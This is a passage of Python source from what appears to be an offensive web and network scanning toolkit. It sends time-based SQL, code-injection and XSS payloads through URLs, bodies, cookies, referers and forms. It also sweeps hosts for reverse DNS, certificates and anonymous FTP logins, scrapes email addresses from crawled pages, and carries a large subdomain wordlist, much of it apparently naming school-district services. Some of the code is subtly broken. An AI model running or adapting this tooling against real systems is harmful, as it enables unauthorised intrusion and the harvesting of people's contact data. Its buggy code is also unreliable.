                                if end - start >= 45:
                                    hits.append(f"my sql injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"my sql injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for oracle sql injection
        for mal in mal_oracle_sql:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"oracle sql injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"oracle sql injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"oracle sql injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"oracle sql injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"oracle sql injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"oracle sql injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for perl injection
        for mal in mal_perl:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"perl injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"perl injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"perl injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"perl injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"perl injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"perl injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for php injection
        for mal in mal_php:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"php injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"php injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"php injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"php injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"php injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"php injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for postgresql injection
        for mal in mal_postgresql:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"postgresql injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"postgresql injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"postgresql injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"postgresql injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"postgresql injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"postgresql injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for powershell injection
        for mal in mal_powershell:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"powershell injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"powershell injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"powershell injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"powershell injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"powershell injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"powershell injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for python injection
        for mal in mal_python:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"python injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"python injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"python injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"python injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"python injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"python injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for ruby injection
        for mal in mal_ruby:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ruby injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ruby injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ruby injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ruby injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"ruby injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"ruby injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for xss
        for mal in mal_xss:
            try:
                time.sleep(delay)
                data = text(_ + "/" + mal)
                if mal in data:
                    hits.append(f"xss in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                data = text(_, data = mal.encode())
                if mal in data:
                    hits.append(f"xss in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                data = text(_, headers = {"Cookie",mal})
                if mal in data:
                    hits.append(f"xss in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                data = text(_, headers = {"Referer",mal})
                if mal in data:
                    hits.append(f"xss in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                data = text(action,method=method_field,data=field_dict)
                                if mal in data:
                                    hits.append(f"xss in forms: {action} | {field_dict}")

                            else:
                                data = text(action,method=method_field,data=field_dict)
                                if mal in data:
                                    hits.append(f"xss in forms: {_} | {field_dict}")

                except:
                    pass

    clear()
    hits = list(set(hits[:]))
    hits.sort()

    if len(hits) > 0:
        with open("cobra.log", "a") as file:
            for hit in hits:
                file.write(f"{hit}\n")
                print(RED + hit)

    else:
        with open("cobra.log", "a") as file:
            file.write(f"we didn't find anything interesting on {host}\n")
            print(GREEN + f"we didn't find anything interesting on {host}")



import ipaddress
import json
import os
import random
import re
import socket
import ssl
import threading
import time
from ftplib import FTP,FTP_TLS
from TheSilent.cobra import cobra
from TheSilent.clear import clear
from TheSilent.kitten_crawler import kitten_crawler
from TheSilent.puppy_requests import text

CYAN = "\033[1;36m"

def kiwi_juice(dns_host,delay,scripts):
    global hits
    success = False

    # check reverse dns
    try:
        time.sleep(delay)
        hits.append(f"reverse dns {dns_host}: {socket.gethostbyaddr(dns_host)}")
        success = True
    except:
        pass

    # check if host is up
    try:
        time.sleep(delay)
        my_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        my_socket.settimeout(10)
        my_socket.connect((dns_host,80))
        my_socket.close()
        hits.append(f"found {dns_host}")
        success = True
    except ConnectionRefusedError:
        hits.append(f"found {dns_host}")
        success = True
    except TimeoutError:
        hits.append(f"found {dns_host}")
        success = True
    except:
        pass
        

    if success:
        # check ssl cert info
        try:
            time.sleep(delay)
            context = ssl.create_default_context()
            context.check_hostname = True
            ssl_socket = context.wrap_socket(socket.socket(socket.AF_INET),server_hostname=dns_host)
            ssl_socket.settimeout(10)
            ssl_socket.connect((dns_host,443))
            data = ssl_socket.getpeercert()
            ssl_socket.close()
            hits.append(f"ssl cert info {dns_host}: {json.dumps(data,sort_keys=True,indent=4)}")
        except:
            pass
        try:
            time.sleep(delay)
            context = ssl.create_default_context()
            context.check_hostname = True
            ssl_socket = context.wrap_socket(socket.socket(socket.AF_INET),server_hostname=dns_host)
            ssl_socket.settimeout(10)
            ssl_socket.connect((dns_host,8443))
            data = ssl_socket.getpeercert()
            ssl_socket.close()
            hits.append(f"ssl cert info {dns_host}: {json.dumps(data,sort_keys=True,indent=4)}")
        except:
            pass

        if scripts == "all":
            # check for emails
            links = kitten_crawler(f"http://{dns_host}",delay,1000,False)
            for link in links:
                time.sleep(delay)
                try:
                    my_request = text(link)
                    results = re.findall("[a-zA-Z0-9\_\.]{3,}@[a-zA-Z0-9\_\.]{3,}\.[a-zA-Z0-9\_\.]+",my_request)
                    for result in results:
                        domain = ".".join(dns_host.split(".")[-2:])
                        if domain in result:
                            hits.append(result)
                except:
                    pass
            
            # check for anonymous ftp binds
            try:
                time.sleep(delay)
                ftp = FTP(dns_host,timeout=10)
                ftp.login()
                hits.append(f"anonymous ftp bind allowed on: {dns_host}")
            except:
                pass
            try:
                time.sleep(delay)
                ftps = FTP_TLS(dns_host,timeout=10)
                ftps.login()
                hits.append(f"anonymous ftp over tls bind allowed on: {dns_host}")
            except:
                pass

            # run cobra web python injection scanner
            time.sleep(delay)
            results = cobra(f"http://{dns_host}",delay,1000,False)
            for result in results:
                hits.append(f"{dns_host}- {result}")

        if scripts == "email":
            # check for emails
            links = kitten_crawler(f"http://{dns_host}",delay,1000,False)
            for link in links:
                time.sleep(delay)
                try:
                    my_request = text(link)
                    results = re.findall("[a-zA-Z0-9\_\.]{3,}@[a-zA-Z0-9\_\.]{3,}\.[a-zA-Z0-9\_\.]+",my_request)
                    for result in results:
                        domain = ".".join(dns_host.split(".")[-2:])
                        if domain in result:
                            hits.append(result)
                except:
                    pass

        if scripts == "ftp":
            # check for anonymous ftp binds
            try:
                time.sleep(delay)
                ftp = FTP(dns_host,timeout=10)
                ftp.login()
                hits.append(f"anonymous ftp bind allowed on: {dns_host}")
            except:
                pass
            try:
                time.sleep(delay)
                ftps = FTP_TLS(dns_host,timeout=10)
                ftps.login()
                hits.append(f"anonymous ftp over tls bind allowed on: {dns_host}")
            except:
                pass

        if scripts == "vuln":
            # run cobra web vulnerability scanner
            time.sleep(delay)
            results = cobra(f"http://{dns_host}",delay,1000,False)
            for result in results:
                hits.append(f"{dns_host}- {result}")

def kiwi(host,delay=0,scripts=None,cores=1):
    global hits
    clear()
    init_host = host
    hits = []
    if re.search("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,2}$",host):
        hosts = []
        for _ in ipaddress.ip_network(host,strict=False):
            hosts.append(str(_))
        hosts = random.sample(hosts,len(hosts))

    else:
        hosts = [host]

    if re.search("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",host):
        subnet = True

    else:
        subnet = False
    
    subdomains = ["","aams","accent","accounts","acs-xs","acsamid01","acsids","acsnas","activeapplicant","activeresources","ad","adams","adfs","adm","admin","aes","aesdvr1","agenda","aggies","agsd520","ahs","ain-fortigate","airwatch","akhistory","akp-fortigate","akpk","alex2","alio","aliointel","alioportal","alltube","alpine","alt","alumni","ambler","ams","anc-fortigate","anc-opn","anchserv","angel","aovpn","apache","api","aplus","apple","appleid","apply","apps","apps2","apps3","aps","arabamid","arboretum","arc","archiver","asas","asburyhigh","asg","assessment","assets","atq-fortigate","atrium","atriuum","attalla","auth","auth1","auth2","autodiscover","av","aw","backup","barracuda","barracuda1","bbb","bbbsd-iv-1","bbcesmoodle","bbchsmoodle","bcbeiboss2","bcboefilewave","bcrobotics","bcsipmonitor","bear","believeyoucan","bensonsd","bes","bess-proxy","bet-vm-moodle4","beverlye","bibbcompass","bibbdestiny","bibbdocumentserver","bigbluebutton","bigboy","blackboard","block","blocker","blog","blogs","bm","bmon","bms-audioe","boe-emailsrv","books","bridgit","brindleemiddle","brindleemountainhigh","brw-ava-cctv-1","brw-fortigate","brw-opn","bsd-ps8","bsd-spam","bsl","buckhornhigh","busshop","butlerco","calendar","canvas","carver","casarry","casper","cassidy","catalog","causeyband","cbfw","ccctc","cchs","ccs","ccsd","ccssotraining","certifiedportal","cesmoodle","chinleusd","choice","chsmoodle","ciscoasa","citrix","cl","classlink","classweb","claysville","claysvillejuniorhigh","clearpass1","cloverdale","cms","cmsmoodle","cnp","cobalt","cochise","collab-edge","communityeducation","compass","compasslearning","conecuh","connect","connectdev","coronado","counseling","cov","covid19","cpanel","cpcalendars","cpcontacts","cpi","cppm1","cs-voip","csg","ctcsec","cusdextdns01","cusdextdns02","cusdntuamx1","cyberbase","cybernew","d2l","daleville","dare","darelementary","darhigh","darmiddle","dart","dartdemo","dartdemo2","dataservice","datavault","datsrv055","dcsamid01","dcsfws","dcsnamidcl","dcsxserve","ddi","decisioned","dell-learn","denali","des","designthefuture","desigo","destination","destiny","dev","dialin","dio","diocam","discovervideo","dlg","dlgconferences","dmm","dmsftp","dn","dns","dns1","dns2","docefill","docs","documentservices","domain","donat","donat2","donehoo","dothan","dothanhigh","dothantech","douglaselementary","douglashigh","douglasmiddle","dreamjob411","dsviewer","e2010","ebes","ebooks","eclass","eclass2","ecsinow","ecspowerschool","edulog","edutrax","edynamic","ees","eforms","eli","email","employeeportal","employees","engage","engage2","engagepd","enrollment","ens","eonline","es","eschool","eschoolhac","esmoodle","esms","ess","et","etcentral","etcontent","etsecurity","etsts","eurabrown","evans","excert","exchange","exchange-edge","expressway","faine","fairbanks-allworx","fairview","falcon1","familylink","fce","fea","fed","fes","filemaker","filewave","filter","finance","floyd","flp","fmpcal","follett","formcentral","forms","fortigate","fortis","four-peaks-elem","four-peaks-elem-2","frame","franklin","fs","ftp","fw","gadsdencity-hs","gam","gces","gchs","geo","gila","girard","girardms","gje","glennallenhonorsocieties","glv","gmail","gms","go","gpa","grades","grandview","greene","groups","grpwise","guac","guac-test","gw","gwguard","happytimes","hcs-ess","hct","hd","hdcsmtp1","hdctab","heard","hekla","help","helpdesk","henryclay","henryconnects","heritagehigh","hes","hhs","highlands","hms","home","homewood","honeysuckle","hs","hydaburg","iboss","ibossoc","ibossreporter","icl","icreports","idb","imail","info","infocus","infonowweb","inow","inowapi","inowhome","inowreports","inowtest","interventions","interweb","intranet","inventory","iparent","it","ivisions","jasper","jds","jds-ext","jhs","join","jrotc1","jsj-cam","jss","jupiter","k9spud","kak-fortigate","kb","kbox","kc","keklms","kellysprings","keynet","kgk","kgklms","kibsdenrollment","kibsdzendto","kka","kobuk","kronmobile","kronos","kts","lcs-amid01","ldap","lee","legacy","les","lesmoodle","lessonplans","lhs","lhsmoodle","lib","library","lightspeed","lightspeed2","links","listsrv","lms","lunch","maconexch","macpro","madisoncity","mahara","mail","mail1","mail2","mail4","mail7","mailserver","maintenance","maps","marengo","mars","math","matterhorn","mbsasa","mc","mcep","mcnary","mconline","mcpsnet","mcs-tools","mcsportal","mdm","mdm2","mealapp","mealapplication","mealapps","media","meet","meetme","mes","mesmoodle","mhsmoodle","micollab","midfield","mine","mitchell","mmsmoodle","mobile","mobilefilter","monroe","montage","montagebeta","montana","moodle","moodle17","moodle2","mps","mps-filewave","mps-powerschool","mps-rdp-01","mps-solarwinds","ms","msc-mobile","msc-print","msc7","mscs","mserve","mta","mta-sts","mts","mx","mx1","mx2","my","mydocs","myfiles","mypay","mystop","mytime","n2h2","naco","nactec","nagios","nas","nes","netview","newmail","nextcloud","nextgen","ng","ngweb","nms","noatak","northview","ns","ns1","ns2","ns3","nui-fortigate","nutrition","oaes","ocsad3","ocsarchive","ocsbo","ocscomm","ocsgwava","ocshelpdesk","ocslms","ocsmail","ocsweb","ocswww","odyssey","office","oldmail","oldregistration","onesync","onlinemealapp","opelika-ls","owa","packetview","pages","palmer","palominas","pandora","paperless","parent","parentportal","parentsurvey","passwordreset","passwordresetregistration","patriotpath","payday","paydocs","payroll","paystubs","pbx","pcmon","pcslibrary","pd","pdexpress","pdmoodle","pho-fortigate","piedmont","pinpoint","piz-fortigate","pl","pm","podcasts","polycom","pop","portal","powerschool","pres","preschool","proxy","proxy2","ps","ps-sandbox","ps-test","pssb","pstest","publicaccess","pulse","pwchange","quarantine","radius","randolph","rbhudson","rcs","rdp","rds","read","readydesk","records","registration","relay","relay1","relay2","remotesupport","r